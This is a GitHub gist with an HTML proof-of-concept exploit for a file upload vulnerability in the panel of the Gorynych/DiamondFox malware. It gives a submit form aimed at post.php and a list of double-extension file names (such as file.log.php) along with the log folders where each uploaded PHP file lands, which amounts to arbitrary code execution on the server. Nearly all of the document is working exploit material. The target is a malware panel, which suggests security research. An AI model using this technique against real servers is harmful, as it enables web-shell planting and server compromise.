Skip to content

Instantly share code, notes, and snippets.

@Xyl2k
Created June 17, 2015 18:13
Show Gist options
  • Save Xyl2k/584454b6796206832462 to your computer and use it in GitHub Desktop.
Save Xyl2k/584454b6796206832462 to your computer and use it in GitHub Desktop.
Gorynych/DiamondFox v4.2.0.257- File Upload Vulnerability
<!DOCTYPE html>
<html>
<head>
<title>Gorynych v4.2.0.257- File Upload Vulnerability</title>
<!-- Panel.zip hash: e698cf7cc57b20c02fce6de83299b75b -->
</head>
<body>
<h1>&#9673; Gorynych/DiamondFox v4.2.0.257 - File Upload Vulnerability &#9673;</h1>
<form action="http://localhost/Panel/post.php" method="POST" enctype="multipart/form-data">
<input type="file" name="upload1">
<input type="hidden" name="slots" value="1">
<input type="submit" value="PWN!"">
</form>
File naming convention:<br>
&#9733; file.log.php (go to logs/dump/file.log.php)<br>
&#9733; file.jpg.php (go to logs/scr/file.jpg.php)<br>
&#9733; file.LOG.php (go to logs/pass/file.LOG.php)<br>
&#9733; file.txt.php (go to logs/ftp/file.txt.php)<br>
&#9733; file.TXT.php (go to logs/rdp/file.TXT.php)<br>
&#9733; file.TxT.php (go to logs/mail/file.TxT.php)<br>
&#9733; file.html.php (go to logs/kyl/file.html.php)<br>
&#9733; file.wallet.php (go to logs/wallet/file.wallet.php)
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment